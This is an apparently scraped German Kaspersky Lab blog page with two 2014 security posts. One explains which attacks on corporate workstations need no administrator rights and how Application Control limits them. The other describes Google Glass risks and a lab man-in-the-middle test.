Wir haben mit Erstaunen festgestellt, dass die Aktivität fast aller Affiliate Programme, die wir verfolgten, im letzten Frühjahr deutlich zurückgegangen ist. Unserer Meinung nach liegt ein Grund für diesen Rückgang in einer Antibetrugsinitiative, die die russische Regierung im Mai dieses Jahres gestartet hat.

Wenn Sie mehr über die Android-Bedrohungslandschaft aus der Sicht von Kaspersky Lab und INTERPOL erfahren möchten, finden Sie hier hier den vollständigen Text der Studie.

Löcher im Schutz von Unternehmensnetzwerken: Zugriffskontrolle


  Kirill Kruglov        30 September 2014 | 18:49  MSK

Ihr Kommentar  

Die Gewährleistung der reibungslosen Funktion von kritisch wichtigen Systemen sowie die Minderung des Risikos von Angriffen auf das Unternehmensnetzwerk – das sind die vorrangigen Aufgaben der Abteilung für IT-Sicherheit fast jedes beliebigen Unternehmens. Eine der effektivsten Strategien zur Erfüllung dieser Aufgaben ist die Einschränkung der Befugnisse der Systemanwender.

Aus Sicht der IT-Sicherheit haben kritische Systeme zwei grundlegende Eigenschaften – Ganzheitlichkeit und Zugänglichkeit – von denen das reibungslose Funktionieren dieser Systeme abhängt. Für den Schutz eines Unternehmensnetzwerks vor Attacken muss unbedingt die „Angriffsoberfläche“ (attack surface) verringert werden, indem die Zahl der Geräte und Netzdienste reduziert wird, auf die von außerhalb des Unternehmensnetzwerks zugegriffen werden kann, und indem der Schutz solcher Systeme und Dienste gewährleistet wird, die einen solchen Zugriff benötigen (Web-Services, Gateways, Router, Workstations usw.). Insbesondere Anwendercomputer mit Internetzugang sind ein wichtiger Angriffsvektor auf das Unternehmensnetzwerk.

Um kritische Systeme vor nicht sanktionierten Veränderungen zu schützen und die Möglichkeiten von Angriffen auf ein Unternehmensnetzwerk zu reduzieren, müssen unbedingt die folgenden Maßnahmen ergriffen werden:

  • Festlegen, welche Objekte (Equipment, Systeme, Geschäftsanwendungen, wertvolle Dokumente usw.) im Unternehmensnetzwerk geschützt werden müssen;
  • die Geschäftsprozesse des Unternehmens beschreiben und in Übereinstimmung mit ihnen das Zugriffslevel auf die zu schützenden Objekte definieren;
  • sicherstellen, dass jedem Subjekt (Anwender oder Unternehmensanwendung) ein eindeutiger Account zugeordnet ist;
  • den Zugriff der Subjekte auf die Objekte soweit es geht beschränken, d.h. die Rechte der Subjekte im Rahmen der Geschäftsprozesse einschränken;
  • sicherstellen, dass alle Operationen der Subjekte an den Objekten protokolliert und die Protokolle an sicheren Orten gespeichert werden.

In der Praxis sieht es in einem Unternehmensnetzwerk ungefähr folgendermaßen aus:

  • Alle Unternehmensdokumente werden zentralisiert gespeichert, in allgemeinen Ordnern auf einem der Unternehmensserver (beispielsweise auf einem Server in der Rolle eines Document Controllers).
  • Der Zugriff auf kritische Systeme ist allen verboten, außer den Administratoren – jeder beliebige Admin kann im Falle eines Absturzes aus der Ferne auf das System zugreifen, um alles schnell zu reparieren.
  • Manchmal verwenden die Administratoren einen „gemeinsamen“ Account.
  • Die Accounts aller normalen Mitarbeiter verfügen über die überaus eingeschränkten Rechte eine „gewöhnlichen Anwenders“, doch auf den ersten Wunsch hin kann ein jeder die Rechte eines lokalen Administrators erhalten.

Technisch ist es um Einiges einfacher, kritische Systeme zu schützen als Workstations, da es selten zu Veränderungen der Geschäftsprozesse kommt, die Regelung bezüglich ihres Einsatzes sich kaum ändert und daher auch das kleinste Detail berücksichtigt werden kann. Im Gegensatz dazu ist die Arbeitsumgebung der Anwender chaotisch, die Prozesse ändern sich stetig und zusammen mit ihnen ändern sich die Anforderungen an die Gewährleistung des Schutzes. Zudem stehen viele Anwender jeglichen Einschränkungen skeptisch, wenn nicht gar negativ gegenüber, selbst wenn sie ihre Arbeitsprozesse gar nicht berühren. Daher ist der traditionelle Schutz des Anwenders nach dem Motto aufgebaut: „Lieber Malware durchlassen, als irgendetwas Notwendiges blockieren.“

Im vergangenen Jahr hat das Unternehmen Avecto eine Untersuchung bekannter Sicherheitslücken in der Software von Microsoft durchgeführt und ist zu dem Schluss gekommen, dass „Der Verzicht auf die Nutzung der Rechte eines lokalen Administrators es ermöglicht, die Risiken der Ausnutzung von 92% der kritischen Sicherheitslücken in der Software von Microsoft zu verringern“. Diese Schlussfolgerung erscheint völlig logisch, doch man muss dazu sagen, dass das Unternehmen Avecto keine reale Untersuchung der Sicherheitslücken durchgeführt, sondern lediglich die Daten aus dem Microsoft Vulnerability Bulletin 2013 analysiert hat. Trotzdem liegt es auf der Hand, dass Schadsoftware, die ohne Administratorenrechte gestartet wurde, keine Driver installieren kann, keine Dateien in den Verzeichnissen %systemdrive%, %windir%, %programfiles% usw. erstellen/modifizieren kann, die Konfiguration des Systems nicht verändern kann (insbesondere nicht in den Hauptschlüssel der Registry, HKLM, schreiben), und – was am Wichtigsten ist – keine privilegierten API-Funktionen nutzen kann.

Doch in Wahrheit sind fehlende Administratorenrechte kein wirklich ernsthaftes Hindernis – weder für Schadprogramme noch für Hacker, die in ein Unternehmensnetzwerk eindringen wollen. Erstens finden sich in jedem beliebigen System Dutzende Sicherheitslücken, mit Hilfe derer man sich die notwendigen Rechte verschaffen kann – bis hin zu Privilegien auf Kernel-Ebene. Zweitens existieren auch Bedrohungen, die sich schon mit den Rechten eines gewöhnlichen Anwenders realisieren lassen. Auf dem unten stehenden Schema sind mögliche Angriffsvektoren dargestellt, für deren Umsetzung keine Administratorenrechte erforderlich sind – und genau um diese geht es hier.

Lokale Attacken

Allein mit den Standardrechten eines gewöhnlichen Benutzers ausgestattet, erhält ein Cyberkrimineller vollständigen Zugriff auf die Speicher aller Prozesse, die unter dem Account des Anwenders laufen. Das ist vollkommen ausreichend, um schädlichen Code in die Prozesse einzuschleusen, mit dessen Hilfe das System entfernt gesteuert (Backdoor), die Tastatureingaben abgefangen (Keylogger) und der Content im Browser modifiziert werden kann. Und so weiter.

Da die meisten Antiviren-Programme den Versuch der Einschleusung von unbekanntem Code in die Prozesse blockieren, greifen Cyberverbrecher häufig auf verdeckte Methoden zurück. Ein alternativer Ansatz ist zum Beispiel die Einschleusung einer Backdoor oder eines Keylogger in den Prozess des Browsers – unter Verwendung von Plug-Ins und Erweiterungen. Für den Download eines Plug-Ins sind die Rechte eines gewöhnlichen Benutzers völlig ausreichend, dabei kann der Code des Plug-Ins fast genau das Gleiche machen, was auch ein vollwertiger trojanischer Code tun kann – d.h. entfernt den Browser steuern, die eingegebenen Daten und den Traffic im Browser protokollieren und mit Webservices interagieren und den Inhalt von Seiten modifizieren (Phishing).

Nicht weniger interessant für Cyberkriminelle sind die gewöhnlichen Office-Anwendungen (beispielsweise E-Mail- und IM-Clients), die für Angriffe auf andere Anwender im Netz (unter anderem Phishing und Social Engineering) benutzt werden können. Ein Online-Verbrecher kann sich Zugriff auf Programme wie Outlook, The Bat, Lync, Skype usw. verschaffen, und zwar nicht nur, indem er Code in die entsprechenden Prozesse einschleust, sondern auch über die Programmierschnittstelle und die lokalen Dienste dieser Anwendungen.

Es ist klar, dass nicht nur die Anwendungen, sondern auch die auf dem PC gespeicherten Daten für Cyberkriminelle einen großen Wert darstellen können. Neben Unternehmensdokumenten suchen Kriminelle oft nach Dateien verschiedener Anwendungen, die Passwörter, verschlüsselte Daten, digitale Schlüssel (SSH, PGP und andere) und vieles mehr enthalten. Befindet sich auf dem Computer eines Anwenders Quellcode, so können Cybergangster versuchen, ihren schädlichen Code dort einzuschleusen.

Domain-Attacken

Da die Konten der meisten Unternehmensanwender Domain-Accounts sind, ermöglicht der Mechanismus der Domain-Autorisierung (Windows Authentication) dem Anwender den Zugriff auf unterschiedliche Netzdienste im Unternehmensnetzwerk. Häufig wird der Zugriff automatisch bereitgestellt, ohne zusätzliche Abfrage der Login-Daten und des Passworts. Wenn ein infizierter Anwender also Zugriffsrechte auf irgendeine Unternehmensdatenbank besitzt, so kann ein Cyberkrimineller sie ebenfalls problemlos nutzen.

Mit Hilfe der Domain-Autorisierung haben Cyberkriminelle auch Zugriff auf alle Netzwerkordner und –Festplatten, die für den Anwender verfügbar sind, auf interne Internet-Ressourcen und manchmal auch auf andere Workstations im selben Segment des Netzwerks.

Neben Netzwerkordnern und Datenbanken finden sich in einem Unternehmensnetzwerk nicht selten verschiedene Netzdienste, wie z.B. Remote-Zugriff, FTP, SSH, TFS, GIT, SVN usw. Selbst wenn für den Zugriff auf diese Dienste separate Accounts (also keine Domain-Konten) verwendet werden, kann ein Online-Verbrecher sie problemlos im Arbeitsprozess des Anwenders nutzen (d.h. während einer aktiven Sitzung).

Schutz

Es ist praktisch unmöglich, ein hohes Sicherheitsniveau auf Workstations zu gewährleisten, nur indem den Anwendern die Administratorenrechte entzogen werden. Auch die Installation von Antiviren-Software auf einer Workstation erhöht vielleicht den Schutz, löst aber nicht alle Probleme. Zum Erreichen eines hohen Sicherheitsniveaus kann die Technologie Application Control („Anwendungskontrolle“) beitragen, die aus drei Schlüsselelementen besteht:

  1. Im Modus ‚Default Deny’ (standardmäßig verboten) wird nur solche Software installiert und ausgeführt, die vom Administrator zugelassen wurde. Dabei muss der Administrator keineswegs jede einzelne Anwendung in die Weiße Liste aufnehmen (Hash). Ihm steht eine Vielzahl von generischen Tools zur Verfügung, die es ermöglichen, der Liste der erlaubten Software dynamisch alle Programme hinzuzufügen, die mit dem einen oder anderen Zertifikat signiert sind, von bestimmten Herstellern entwickelt wurden, aus vertrauenswürdigen Quellen stammen oder in der Whitelisting-Datenbank eines Produzenten von Sicherheitslösungen enthalten sind.
  2. Der Modus ‚Kontrolle vertrauenswürdiger Anwendungen‘ macht es möglich, die Arbeit der zugelassenen Software auf die Funktionen zu beschränken, die diese Software auch tatsächlich ausführen soll. Für seine normale Funktionsweise sollte ein Browser beispielsweise die Möglichkeit haben, Netzverbindungen herzustellen, doch dabei ist es keineswegs notwendig, dass der Browser den Speicher anderer Prozesse ausliest bzw. hineinschreibt, sich mit Netz-Datenbanken verbindet oder Dateien in Internetressourcen speichert.
  3. Die Kontrolle der Update-Installation ermöglicht die reibungslose Aktualisierung von Software auf Workstations (im Modus ‚Default Deny‘), während gleichzeitig das Risiko einer Systeminfektion durch Update-Mechanismen gemindert wird.

Neben dem oben Aufgeführten stellen konkrete Produkte mit integrierter Application Control auch verschiedene andere nützliche Funktionen auf der Grundlage dieser Technologie bereit. Insbesondere sind das die Inventarisierung, die Kontrolle der im Netzwerk installierten Software, das Zusammenstellen von Ereignisberichten (die bei der Untersuchung von Sicherheitsvorfällen hilfreich sein können) usw.

Die Kombination der Technologien ermöglicht es einerseits, dem Nutzer all das an die Hand zu geben, was er für seine Arbeit und selbst zu Unterhaltungszwecken braucht. Und selbst wenn er morgen noch irgendetwas anderes benötigt, so kann er sich dieses „Irgendetwas“ ohne Probleme besorgen. Gleichzeitig aber sind die Möglichkeiten eines Cyberkriminellen, der sich Zugriff auf ein geschütztes System verschaffen konnte, überaus eingeschränkt. Zweifellos ist das die ideale Balance zwischen Flexibilität und Sicherheit beim Schutz von Unternehmensnetzwerken.

Wie Cyberkriminelle die Welt durch Ihre Augen sehen


  Roberto Martinez       10 September 2014 | 17:03  MSK

Ihr Kommentar  

Technologie hat unser Leben verändert, unsere Art zu leben, unsere Art zu arbeiten. Durch das Aufkommen von „Wearable Computern“, tragbaren Computersystemen also, die während der Anwendung am Körper des Nutzers befestigt sind, erscheint den Menschen die Verschmelzung der virtuellen mit der physikalischen Welt immer selbstverständlicher, denn sie nutzen diese Technologie nun ununterbrochen. Google Glass ist eins der erstaunlichsten tragbaren Geräte, und obgleich es sich noch in einem frühen Entwicklungsstadium befindet, lässt sich nicht leugnen, dass man tolle Sachen damit anstellen und die Welt mit dem Gerät auf eine andere Art und Weise erfahren kann.

google_glass_1

Mit der Out-the-Box-Funktionalität kann man das Internet durchsuchen, Fotos oder Videos aufnehmen, E-Mails checken, Nachrichten senden oder Informationen auf Google+ veröffentlichen. Was uns wirklich fasziniert, sind die denkbaren Einsätze solcher Geräte in Bereichen wie Medizin und Bildung. Das Gerät könnte für Chirurgen unentbehrlich werden, um die vitalen Funktionen von Patienten zu kontrollieren oder Operationen live per Video an andere Spezialisten zu senden. Ebenso sind neue Möglichkeiten vorstellbar, Studenten Wissen interaktiv zu vermitteln. Möglicherweise sind sogar Verbesserungen in der Strafverfolgung möglich, beispielsweise durch eine sofortige Identifizierung von gesuchten Verbrechern.

google_glass_2


google_glass_3

Leider gehen mit neuen Technologien auch immer neue Sicherheitsrisiken einher. Es gibt tatsächlich viele Bedenken wegen der potentiellen Datenschutz-Risiken und der Art, wie diese neuen Geräte kompromittiert werden könnten. Cyberkriminelle liegen nicht auf der faulen Haut und suchen ständig nach neuen Wegen, sich an ihren Opfern zu bereichern – wann immer sich ihnen eine solche Möglichkeit bietet, arbeiten sie Tag und Nacht daran, ihr Ziel zu erreichen.

Neue Technologien, alte Risiken.

google_glass_4

Neue und bereits bekannte Geräte haben vieles gemeinsam: Sie verwenden dieselben Protokolle und sind mit anderen Geräten, die ähnliche Apps verwenden, vernetzt. Daran geht kein Weg vorbei. Traditionelle Angriffsvektoren sind meist auf die Netzwerkebene ausgerichtet, in Form von Man-in-The-Middle-Attacken (MiTM), auf die Ausnutzung von einigen Sicherheitslücken im Betriebssystem oder in den Anwendungen selbst. Da Glass auf Android basiert, könnte es bekannte Sicherheitslücken enthalten, die in anderen Geräten mit demselben Betriebssystem gefunden wurden.

Es gibt zwei Arten, mit Google Glass im Internet zu surfen: Via Bluetooth in Kombination mit einem mobilen Gerät, das seine Netzwerkverbindung teilt, oder direkt über Wi-Fi mit vorheriger Konfiguration des Netzwerks über den MyGlass-Account oder einen von einer mobilen App generierten QR-Code.

google_glass_5


google_glass_6



Das Hinzufügen eines Netzwerks ist überaus simpel: Durch das Eintragen eines Netzwerknamens und eines Passworts wird ein QR-Code generiert, der die Verbindungseinstellungen enthält, die dann – wenn durch Glass darauf geschaut wird – eine automatische Verbindung zum Netzwerk herstellen.

google_glass_7



Letztes Jahr wurde von dem Sicherheitsunternehmen Lookout eine Sicherheitslücke im Zusammenhang mit dieser Prozedur veröffentlicht, die dazu führen könnte, dass der Nutzer dazu gebracht wird, sich über einen schädlichen QR-Code mit einem gefälschten Zugriffspunkt zu verbinden. Potentielle Angreifer hätten damit die Möglichkeit, die Netzwerkkommunikation abzufangen und die Navigation zu einer schädlichen Webseite umzuleiten, die eine bekannte Android-Web-Sicherheitslücke ausnutzen könnte. Diese Sicherheitslücke wurde gepatcht, doch sie hat uns deutlich vor Augen geführt, dass Angreifer durchaus in der Lage sind, Wege aufzutun, diese neuen Geräte zu kompromittieren.

Eine potentiell Risikoquelle besteht darin, dass das Glass-Interface – anders als es bei Computern oder mobilen Geräten der Fall ist - über ‘Cards’ navigiert wird, um durch die verschiedenen Anwendungen und Einstellungen zu scrollen, wodurch die Konfigurationsoptionen eingeschränkt werden und in manchen Fällen bestimmte Prozeduren und Funktionen mit nur geringem Input seitens des Users automatisiert werden, wie z.B. beim Verbinden mit einem Netzwerk oder beim Teilen von Informationen. Diese Automatisierung öffnet der Ausnutzung durch Angreifer und der Kompromittierung privater Anwenderdaten Tor und Tür.

Ein weiteres Einfallstor für Cyberbedrohungen ist die Neigung der User, den 'Debug Mode’ zu aktivieren, um auch Anwendungen außerhalb des offiziellen Glassware-Ökosystems zu installieren, wobei allerdings auch das Risiko steigt, schädliche Anwendungen zu installieren.

Dadurch wird auch die Möglichkeit eröffnet, neue Angriffe unter Verwendung alter Methoden durchzuführen, wie etwa Social Engineering – mit Hilfe der magischen Wörter „kostenlos“ und „Sex“. Obgleich nicht alle Apps, die auf diese Art beworben werden, schädlich sind, sind diese Begriffe Magneten für Anwender, die auf der Suche nach neuen Erfahrungen bereit sind, den vom Hersteller vorbereiteten komfortablen Bereich zu verlassen.

google_glass_8



Ein einfacher Test

Wie bereits oben erwähnt, unterscheidet sich Glass insbesondere dadurch von anderen „Wearables“, dass es möglich ist, sich direkt über eine Wi-Fi-Verbindung im Internet zu bewegen, ohne ein mobiles Gerät „huckepack“ haben zu müssen, von dem man abhängig ist. Trotzdem bedeutet diese Fähigkeit auch, dass das Gerät potentiell Angriffen über das Netzwerk ausgesetzt ist, insbesondere MiTM.

Stellen Sie sich einmal vor, Sie sitzen in Ihrem Lieblingscafé und möchten sich mit Glass mit dem Wi-Fi-Netz verbinden. Sie stellen das Netzwerk ein und sind schon unterwegs – Sie checken sich bei Foursquare ein, starten eine App, um den Song, der im Hintergrund gespielt wird zu identifizieren und den dazugehörigen Songtext abzurufen. Doch was ist, wenn jemand in dem Netzwerk ein Tool verwendet, um die anderen Geräte dazu zu bringen den Traffic zu einer IP-Adresse umzuleiten und so den gesamten Netzwerk-Traffic zu kapern?

Wir haben genau diese Situation in einem kontrollierten Labor-Netzwerk simuliert. Sobald das Netzwerk kompromittiert war, haben wir bei Google einige Suchanfragen gestellt, sind auf einige harmlose Seiten gesurft, haben Bilder und Mitteilungen an ein paar unserer Kontakte verschickt und sogar die neusten Nachrichten gelesen.

google_glass_9



Sobald wir ausreichend Traffic für eine Analyse abgefangen hatten, fanden wir heraus, dass fast der gesamte Traffic auch nach der Kompromittierung des Netzwerks verschlüsselt blieb, insbesondere die Google-Suchen. Wir fanden allerdings genügend Informationen in Klartext, um die Bewegung des Users zu Fluggesellschaften, Hotels und Touristenzielen nachzuvollziehen und zu rekonstruieren. Wir konnten zudem bestimmen, wie und wo das Gerät verbunden war. Keine allzu sensitiven Daten, die allerdings nützlich sein könnten, wenn es darum geht, ein Nutzer-Profil zu erstellen.

Letztlich muss man sich die Sicherheit – wie bei anderen Geräten auch – in Ebenen vorstellen, und wir müssen jede Ebene schützen, um das Risiko einer Kompromittierung zu verringern. In diesem Fall könnte die Netzwerk-Ebene ausgenutzt werden, da sich das Gerät mit öffentlichen Netzwerken verbinden kann, aber nicht über die Option für VPN-Verbindungen verfügt, so dass Traffic abgefangen und analysiert werden kann.

In den kommenden Monaten werden wir feststellen müssen, dass am Körper tragbare Geräte zum neuen Angriffsziel werden. Das heißt, wir müssen diesen Geräten unsere besondere Aufmerksamkeit zuteilwerden lassen, ebenso wie ihren Möglichkeiten und den Informationen, die sie verarbeiten.

Folgen Sie mir auf Twitter @r0bertmart1nez

Nach oben  |  Archiv >>

 

Copyright © 1996 - 2014
Kaspersky Lab
Industry Leading Antivirus Software
Alle Rechte vorbehalten
 

Email: webmaster@kaspersky.com
Datenschutzbestimmungen